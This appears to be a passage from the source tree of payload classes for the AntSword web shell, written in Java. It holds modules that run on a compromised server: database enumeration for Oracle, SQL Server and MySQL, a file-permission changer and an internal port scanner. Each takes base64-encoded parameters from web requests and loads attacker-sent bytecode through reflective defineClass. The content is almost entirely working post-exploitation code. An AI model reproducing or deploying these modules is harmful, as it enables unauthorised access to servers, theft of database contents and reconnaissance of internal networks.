104 | Field req = request.getClass().getDeclaredField("request");
105 | req.setAccessible(true);
106 | Object request2 = req.get(request);
107 | Field resp = request2.getClass().getDeclaredField("response");
108 | resp.setAccessible(true);
109 | response = resp.get(request2);
110 | } catch (Exception ex) {
111 | try {
112 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
113 | } catch (Exception ignored) {
114 |
115 | }
116 | }
117 | }
118 | }
119 | }
120 |
121 | public String asoutput(String str) {
122 | try {
123 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
124 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
125 | defineClassMethod.setAccessible(true);
126 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
127 | return cc.getConstructor(String.class).newInstance(str).toString();
128 | } catch (Exception e) {
129 | return str;
130 | }
131 | }
132 |
133 | public byte[] Base64DecodeToByte(String str) {
134 | byte[] bt = null;
135 | String version = System.getProperty("java.version");
136 | try {
137 | if (version.compareTo("1.9") >= 0) {
138 | Class clazz = Class.forName("java.util.Base64");
139 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
140 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
141 | } else {
142 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
143 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
144 | }
145 | return bt;
146 | } catch (Exception e) {
147 | return new byte[]{};
148 | }
149 | }
150 | }
--------------------------------------------------------------------------------
/src/database/oracle/Show_databases.java:
--------------------------------------------------------------------------------
1 | package database.oracle;
2 |
3 | import java.lang.reflect.Field;
4 | import java.sql.*;
5 |
6 | public class Show_databases {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargencode";
21 | String varkey2 = "antswordargconn";
22 | String varkeydecoder = "antswordargdecoder";
23 |
24 | try {
25 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
26 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
27 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
28 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
29 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
30 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
31 | output.append(showDatabases(z1, z2));
32 | } catch (Exception e) {
33 | output.append("ERROR:// " + e);
34 | }
35 | try {
36 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
37 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
38 | } catch (Exception ignored) {
39 | }
40 | return true;
41 | }
42 |
43 | String decode(String str) throws Exception {
44 | int prefixlen = 0;
45 | try {
46 | prefixlen = Integer.parseInt(randomPrefix);
47 | str = str.substring(prefixlen);
48 | } catch (Exception e) {
49 | prefixlen = 0;
50 | }
51 | if (encoder.equals("base64")) {
52 | return new String(this.Base64DecodeToByte(str), this.cs);
53 | }
54 | return str;
55 | }
56 |
57 | String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
58 | throws Exception {
59 | String ret = "";
60 | String[] x = conn.trim().replace("\r\n", "\n").split("\n");
61 | Class.forName(x[0].trim());
62 | String url = x[1];
63 | Connection c = DriverManager.getConnection(url, x[2], x[3]);
64 | Statement stmt = c.createStatement();
65 | ResultSet rs = stmt.executeQuery(sql);
66 | ResultSetMetaData rsmd = rs.getMetaData();
67 |
68 | if (needcoluname) {
69 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
70 | String columnName = rsmd.getColumnName(i);
71 | ret += columnName + columnsep;
72 | }
73 | ret += rowsep;
74 | }
75 |
76 | while (rs.next()) {
77 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
78 | String columnValue = rs.getString(i);
79 | ret += columnValue + columnsep;
80 | }
81 | ret += rowsep;
82 | }
83 | return ret;
84 | }
85 |
86 | String showDatabases(String encode, String conn) throws Exception {
87 | String sql = "SELECT USERNAME FROM ALL_USERS ORDER BY 1";
88 | String columnsep = "\t";
89 | String rowsep = "";
90 | return executeSQL(encode, conn, sql, columnsep, rowsep, false);
91 | }
92 |
93 | public void parseObj(Object obj) {
94 | if (obj.getClass().isArray()) {
95 | Object[] data = (Object[]) obj;
96 | request = data[0];
97 | response = data[1];
98 | } else {
99 | try {
100 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
101 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
102 | } catch (Exception e) {
103 | request = obj;
104 | try {
105 | Field req = request.getClass().getDeclaredField("request");
106 | req.setAccessible(true);
107 | Object request2 = req.get(request);
108 | Field resp = request2.getClass().getDeclaredField("response");
109 | resp.setAccessible(true);
110 | response = resp.get(request2);
111 | } catch (Exception ex) {
112 | try {
113 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
114 | } catch (Exception ignored) {
115 |
116 | }
117 | }
118 | }
119 | }
120 | }
121 |
122 | public String asoutput(String str) {
123 | try {
124 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
125 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
126 | defineClassMethod.setAccessible(true);
127 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
128 | return cc.getConstructor(String.class).newInstance(str).toString();
129 | } catch (Exception e) {
130 | return str;
131 | }
132 | }
133 |
134 | public byte[] Base64DecodeToByte(String str) {
135 | byte[] bt = null;
136 | String version = System.getProperty("java.version");
137 | try {
138 | if (version.compareTo("1.9") >= 0) {
139 | Class clazz = Class.forName("java.util.Base64");
140 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
141 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
142 | } else {
143 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
144 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
145 | }
146 | return bt;
147 | } catch (Exception e) {
148 | return new byte[]{};
149 | }
150 | }
151 | }
--------------------------------------------------------------------------------
/src/database/sqlserver/Show_databases.java:
--------------------------------------------------------------------------------
1 | package database.sqlserver;
2 |
3 | import java.lang.reflect.Field;
4 | import java.sql.*;
5 |
6 | public class Show_databases {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargencode";
21 | String varkey2 = "antswordargconn";
22 | String varkeydecoder = "antswordargdecoder";
23 |
24 | try {
25 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
26 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
27 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
28 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
29 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
30 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
31 | output.append(showDatabases(z1, z2));
32 | } catch (Exception e) {
33 | output.append("ERROR:// " + e);
34 | }
35 | try {
36 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
37 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
38 | } catch (Exception ignored) {
39 | }
40 | return true;
41 | }
42 |
43 | String decode(String str) throws Exception {
44 | int prefixlen = 0;
45 | try {
46 | prefixlen = Integer.parseInt(randomPrefix);
47 | str = str.substring(prefixlen);
48 | } catch (Exception e) {
49 | prefixlen = 0;
50 | }
51 | if (encoder.equals("base64")) {
52 | return new String(this.Base64DecodeToByte(str), this.cs);
53 | }
54 | return str;
55 | }
56 |
57 | String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
58 | throws Exception {
59 | String ret = "";
60 | String[] x = conn.trim().replace("\r\n", "\n").split("\n");
61 | Class.forName(x[0].trim());
62 | String url = x[1];
63 | Connection c = DriverManager.getConnection(url);
64 | Statement stmt = c.createStatement();
65 | ResultSet rs = stmt.executeQuery(sql);
66 | ResultSetMetaData rsmd = rs.getMetaData();
67 |
68 | if (needcoluname) {
69 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
70 | String columnName = rsmd.getColumnName(i);
71 | ret += columnName + columnsep;
72 | }
73 | ret += rowsep;
74 | }
75 |
76 | while (rs.next()) {
77 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
78 | String columnValue = rs.getString(i);
79 | ret += columnValue + columnsep;
80 | }
81 | ret += rowsep;
82 | }
83 | return ret;
84 | }
85 |
86 | String showDatabases(String encode, String conn) throws Exception {
87 | String sql = "select [name] from master.dbo.sysdatabases order by 1";
88 | String columnsep = "\t";
89 | String rowsep = "";
90 | return executeSQL(encode, conn, sql, columnsep, rowsep, false);
91 | }
92 |
93 | public void parseObj(Object obj) {
94 | if (obj.getClass().isArray()) {
95 | Object[] data = (Object[]) obj;
96 | request = data[0];
97 | response = data[1];
98 | } else {
99 | try {
100 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
101 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
102 | } catch (Exception e) {
103 | request = obj;
104 | try {
105 | Field req = request.getClass().getDeclaredField("request");
106 | req.setAccessible(true);
107 | Object request2 = req.get(request);
108 | Field resp = request2.getClass().getDeclaredField("response");
109 | resp.setAccessible(true);
110 | response = resp.get(request2);
111 | } catch (Exception ex) {
112 | try {
113 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
114 | } catch (Exception ignored) {
115 |
116 | }
117 | }
118 | }
119 | }
120 | }
121 |
122 | public String asoutput(String str) {
123 | try {
124 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
125 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
126 | defineClassMethod.setAccessible(true);
127 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
128 | return cc.getConstructor(String.class).newInstance(str).toString();
129 | } catch (Exception e) {
130 | return str;
131 | }
132 | }
133 |
134 | public byte[] Base64DecodeToByte(String str) {
135 | byte[] bt = null;
136 | String version = System.getProperty("java.version");
137 | try {
138 | if (version.compareTo("1.9") >= 0) {
139 | Class clazz = Class.forName("java.util.Base64");
140 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
141 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
142 | } else {
143 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
144 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
145 | }
146 | return bt;
147 | } catch (Exception e) {
148 | return new byte[]{};
149 | }
150 | }
151 | }
--------------------------------------------------------------------------------
/src/database/sqlserver/Show_tables.java:
--------------------------------------------------------------------------------
1 | package database.sqlserver;
2 |
3 | import java.lang.reflect.Field;
4 | import java.sql.*;
5 |
6 | public class Show_tables {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargencode";
21 | String varkey2 = "antswordargconn";
22 | String varkey3 = "antswordargdb";
23 | String varkeydecoder = "antswordargdecoder";
24 |
25 | try {
26 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
27 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
28 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
29 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
30 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
31 | String z3 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey3));
32 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
33 | output.append(showTables(z1, z2, z3));
34 | } catch (Exception e) {
35 | output.append("ERROR:// " + e);
36 | }
37 | try {
38 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
39 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
40 | } catch (Exception ignored) {
41 | }
42 | return true;
43 | }
44 |
45 | String decode(String str) throws Exception {
46 | int prefixlen = 0;
47 | try {
48 | prefixlen = Integer.parseInt(randomPrefix);
49 | str = str.substring(prefixlen);
50 | } catch (Exception e) {
51 | prefixlen = 0;
52 | }
53 | if (encoder.equals("base64")) {
54 | return new String(this.Base64DecodeToByte(str), this.cs);
55 | }
56 | return str;
57 | }
58 |
59 | String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
60 | throws Exception {
61 | String ret = "";
62 | String[] x = conn.trim().replace("\r\n", "\n").split("\n");
63 | Class.forName(x[0].trim());
64 | String url = x[1];
65 | Connection c = DriverManager.getConnection(url);
66 | Statement stmt = c.createStatement();
67 | ResultSet rs = stmt.executeQuery(sql);
68 | ResultSetMetaData rsmd = rs.getMetaData();
69 |
70 | if (needcoluname) {
71 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
72 | String columnName = rsmd.getColumnName(i);
73 | ret += columnName + columnsep;
74 | }
75 | ret += rowsep;
76 | }
77 |
78 | while (rs.next()) {
79 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
80 | String columnValue = rs.getString(i);
81 | ret += columnValue + columnsep;
82 | }
83 | ret += rowsep;
84 | }
85 | return ret;
86 | }
87 |
88 | String showTables(String encode, String conn, String dbname) throws Exception {
89 | String sql = "SELECT [name] FROM sysobjects WHERE xtype='U' ORDER BY 1";
90 | String columnsep = "\t";
91 | String rowsep = "";
92 | return executeSQL(encode, conn, sql, columnsep, rowsep, false);
93 | }
94 |
95 | public void parseObj(Object obj) {
96 | if (obj.getClass().isArray()) {
97 | Object[] data = (Object[]) obj;
98 | request = data[0];
99 | response = data[1];
100 | } else {
101 | try {
102 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
103 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
104 | } catch (Exception e) {
105 | request = obj;
106 | try {
107 | Field req = request.getClass().getDeclaredField("request");
108 | req.setAccessible(true);
109 | Object request2 = req.get(request);
110 | Field resp = request2.getClass().getDeclaredField("response");
111 | resp.setAccessible(true);
112 | response = resp.get(request2);
113 | } catch (Exception ex) {
114 | try {
115 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
116 | } catch (Exception ignored) {
117 |
118 | }
119 | }
120 | }
121 | }
122 | }
123 |
124 | public String asoutput(String str) {
125 | try {
126 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
127 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
128 | defineClassMethod.setAccessible(true);
129 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
130 | return cc.getConstructor(String.class).newInstance(str).toString();
131 | } catch (Exception e) {
132 | return str;
133 | }
134 | }
135 |
136 | public byte[] Base64DecodeToByte(String str) {
137 | byte[] bt = null;
138 | String version = System.getProperty("java.version");
139 | try {
140 | if (version.compareTo("1.9") >= 0) {
141 | Class clazz = Class.forName("java.util.Base64");
142 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
143 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
144 | } else {
145 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
146 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
147 | }
148 | return bt;
149 | } catch (Exception e) {
150 | return new byte[]{};
151 | }
152 | }
153 | }
--------------------------------------------------------------------------------
/src/database/mysql/Show_tables.java:
--------------------------------------------------------------------------------
1 | package database.mysql;
2 |
3 | import java.lang.reflect.Field;
4 | import java.sql.*;
5 |
6 | public class Show_tables {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 |
19 | String tag_s = "->|";
20 | String tag_e = "|<-";
21 | String varkey1 = "antswordargencode";
22 | String varkey2 = "antswordargconn";
23 | String varkey3 = "antswordargdb";
24 | String varkeydecoder = "antswordargdecoder";
25 |
26 | try {
27 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
28 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
29 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
30 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
31 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
32 | String z3 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey3));
33 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
34 | output.append(showTables(z1, z2, z3));
35 | } catch (Exception e) {
36 | output.append("ERROR:// " + e);
37 | }
38 | try {
39 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
40 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
41 | } catch (Exception ignored) {
42 | }
43 | return true;
44 | }
45 |
46 | String decode(String str) throws Exception {
47 | int prefixlen = 0;
48 | try {
49 | prefixlen = Integer.parseInt(randomPrefix);
50 | str = str.substring(prefixlen);
51 | } catch (Exception e) {
52 | prefixlen = 0;
53 | }
54 | if (encoder.equals("base64")) {
55 | return new String(this.Base64DecodeToByte(str), this.cs);
56 | }
57 | return str;
58 | }
59 |
60 | String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
61 | throws Exception {
62 | String ret = "";
63 | String[] x = conn.trim().replace("\r\n", "\n").split("\n");
64 | Class.forName(x[0].trim());
65 | String url = x[1] + "&characterEncoding=" + encode;
66 | Connection c = DriverManager.getConnection(url);
67 | Statement stmt = c.createStatement();
68 | ResultSet rs = stmt.executeQuery(sql);
69 | ResultSetMetaData rsmd = rs.getMetaData();
70 |
71 | if (needcoluname) {
72 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
73 | String columnName = rsmd.getColumnName(i);
74 | ret += columnName + columnsep;
75 | }
76 | ret += rowsep;
77 | }
78 |
79 | while (rs.next()) {
80 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
81 | String columnValue = rs.getString(i);
82 | ret += columnValue + columnsep;
83 | }
84 | ret += rowsep;
85 | }
86 | return ret;
87 | }
88 |
89 | String showTables(String encode, String conn, String dbname) throws Exception {
90 | String sql = "show tables from `" + dbname + "`";
91 | String columnsep = "\t";
92 | String rowsep = "";
93 | return executeSQL(encode, conn, sql, columnsep, rowsep, false);
94 | }
95 |
96 | public void parseObj(Object obj) {
97 | if (obj.getClass().isArray()) {
98 | Object[] data = (Object[]) obj;
99 | request = data[0];
100 | response = data[1];
101 | } else {
102 | try {
103 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
104 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
105 | } catch (Exception e) {
106 | request = obj;
107 | try {
108 | Field req = request.getClass().getDeclaredField("request");
109 | req.setAccessible(true);
110 | Object request2 = req.get(request);
111 | Field resp = request2.getClass().getDeclaredField("response");
112 | resp.setAccessible(true);
113 | response = resp.get(request2);
114 | } catch (Exception ex) {
115 | try {
116 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
117 | } catch (Exception ignored) {
118 |
119 | }
120 | }
121 | }
122 | }
123 | }
124 |
125 | public String asoutput(String str) {
126 | try {
127 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
128 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
129 | defineClassMethod.setAccessible(true);
130 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
131 | return cc.getConstructor(String.class).newInstance(str).toString();
132 | } catch (Exception e) {
133 | return str;
134 | }
135 | }
136 |
137 | public byte[] Base64DecodeToByte(String str) {
138 | byte[] bt = null;
139 | String version = System.getProperty("java.version");
140 | try {
141 | if (version.compareTo("1.9") >= 0) {
142 | Class clazz = Class.forName("java.util.Base64");
143 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
144 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
145 | } else {
146 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
147 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
148 | }
149 | return bt;
150 | } catch (Exception e) {
151 | return new byte[]{};
152 | }
153 | }
154 | }
--------------------------------------------------------------------------------
/src/filemanager/Chmod.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.File;
4 | import java.lang.reflect.Field;
5 |
6 | public class Chmod {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargpath";
21 | String varkey2 = "antswordargmode";
22 | String varkeydecoder = "antswordargdecoder";
23 | try {
24 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
25 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
26 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
27 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
28 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
29 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
30 | output.append(ChmodCode(z1, z2));
31 | } catch (Exception e) {
32 | output.append("ERROR:// " + e);
33 | }
34 | try {
35 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
36 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
37 | } catch (Exception ignored) {
38 | }
39 | return true;
40 | }
41 |
42 | String decode(String str) throws Exception {
43 | int prefixlen = 0;
44 | try {
45 | prefixlen = Integer.parseInt(randomPrefix);
46 | str = str.substring(prefixlen);
47 | } catch (Exception e) {
48 | prefixlen = 0;
49 | }
50 | if (encoder.equals("base64")) {
51 | return new String(this.Base64DecodeToByte(str), this.cs);
52 | }
53 | return str;
54 | }
55 |
56 | String ChmodCode(String path, String permstr) {
57 | try {
58 | int permissions = Integer.parseInt(permstr, 8);
59 | File f = new File(path);
60 | if ((permissions & 256) > 0) {
61 | f.getClass().getDeclaredMethod("setReadable").invoke(f, true, true);
62 | }
63 | if ((permissions & 128) > 0) {
64 | f.getClass().getDeclaredMethod("setWritable").invoke(f, true, true);
65 | }
66 |
67 | if ((permissions & 64) > 0) {
68 | f.getClass().getDeclaredMethod("setExecutable").invoke(f, true, true);
69 | }
70 | if ((permissions & 32) > 0) {
71 | f.getClass().getDeclaredMethod("setReadable").invoke(f, true, false);
72 | }
73 | if ((permissions & 16) > 0) {
74 | f.getClass().getDeclaredMethod("setWritable").invoke(f, true, false);
75 | }
76 | if ((permissions & 8) > 0) {
77 | f.getClass().getDeclaredMethod("setExecutable").invoke(f, true, false);
78 | }
79 | if ((permissions & 4) > 0) {
80 | f.getClass().getDeclaredMethod("setReadable").invoke(f, true, false);
81 | }
82 | if ((permissions & 2) > 0) {
83 | f.getClass().getDeclaredMethod("setWritable").invoke(f, true, false);
84 | }
85 | if ((permissions & 1) > 0) {
86 | f.getClass().getDeclaredMethod("setExecutable").invoke(f, true, false);
87 | }
88 | } catch (Exception e) {
89 | return "0";
90 | }
91 | return "1";
92 | }
93 |
94 | public void parseObj(Object obj) {
95 | if (obj.getClass().isArray()) {
96 | Object[] data = (Object[]) obj;
97 | request = data[0];
98 | response = data[1];
99 | } else {
100 | try {
101 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
102 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
103 | } catch (Exception e) {
104 | request = obj;
105 | try {
106 | Field req = request.getClass().getDeclaredField("request");
107 | req.setAccessible(true);
108 | Object request2 = req.get(request);
109 | Field resp = request2.getClass().getDeclaredField("response");
110 | resp.setAccessible(true);
111 | response = resp.get(request2);
112 | } catch (Exception ex) {
113 | try {
114 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
115 | } catch (Exception ignored) {
116 |
117 | }
118 | }
119 | }
120 | }
121 | }
122 |
123 | public String asoutput(String str) {
124 | try {
125 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
126 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
127 | defineClassMethod.setAccessible(true);
128 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
129 | return cc.getConstructor(String.class).newInstance(str).toString();
130 | } catch (Exception e) {
131 | return str;
132 | }
133 | }
134 |
135 | public byte[] Base64DecodeToByte(String str) {
136 | byte[] bt = null;
137 | String version = System.getProperty("java.version");
138 | try {
139 | if (version.compareTo("1.9") >= 0) {
140 | Class clazz = Class.forName("java.util.Base64");
141 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
142 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
143 | } else {
144 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
145 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
146 | }
147 | return bt;
148 | } catch (Exception e) {
149 | return new byte[]{};
150 | }
151 | }
152 | }
153 |
--------------------------------------------------------------------------------
/src/other/PortScan.java:
--------------------------------------------------------------------------------
1 | package other;
2 |
3 | import java.lang.reflect.Field;
4 | import java.net.InetSocketAddress;
5 | import java.net.Socket;
6 |
7 | public class PortScan {
8 | public Object request = null;
9 | public Object response = null;
10 | public String encoder = "base64";
11 | public String cs = "antswordCharset";
12 | public String randomPrefix = "antswordrandomPrefix";
13 | public String decoderClassdata;
14 |
15 | @Override
16 | public boolean equals(Object obj) {
17 | this.parseObj(obj);
18 | StringBuffer output = new StringBuffer();
19 | String tag_s = "->|";
20 | String tag_e = "|<-";
21 | String varkey1 = "antswordargip";
22 | String varkey2 = "antswordargports";
23 | String varkeydecoder = "antswordargdecoder";
24 |
25 | try {
26 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
27 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
28 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
29 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
30 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
31 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
32 | output.append(Scan(z1, z2));
33 | } catch (Exception e) {
34 | output.append("ERROR:// " + e);
35 | }
36 | try {
37 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
38 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
39 | } catch (Exception ignored) {
40 | }
41 | return true;
42 | }
43 |
44 | String decode(String str) throws Exception {
45 | int prefixlen = 0;
46 | try {
47 | prefixlen = Integer.parseInt(randomPrefix);
48 | str = str.substring(prefixlen);
49 | } catch (Exception e) {
50 | prefixlen = 0;
51 | }
52 | if (encoder.equals("base64")) {
53 | return new String(this.Base64DecodeToByte(str), this.cs);
54 | }
55 | return str;
56 | }
57 |
58 | String Scan(String ip, String ports) throws Exception {
59 | StringBuffer sb = new StringBuffer();
60 | String[] portlist = ports.split(",");
61 | Socket socket = null;
62 | for (int i = 0; i < portlist.length; i++) {
63 | try {
64 | socket = new Socket(ip, Integer.parseInt(portlist[i]));
65 | socket.setSoTimeout(1);
66 | sb.append(ip + "\t" + portlist[i] + "\tOpen\n");
67 | } catch (Exception e) {
68 | sb.append(ip + "\t" + portlist[i] + "\tClosed\n");
69 | } finally {
70 | try {
71 | if (socket != null) {
72 | socket.close();
73 | }
74 | } catch (Exception ex) {
75 | }
76 | }
77 | }
78 | return sb.toString();
79 | }
80 |
81 | Socket createSocket(String addr) throws Exception {
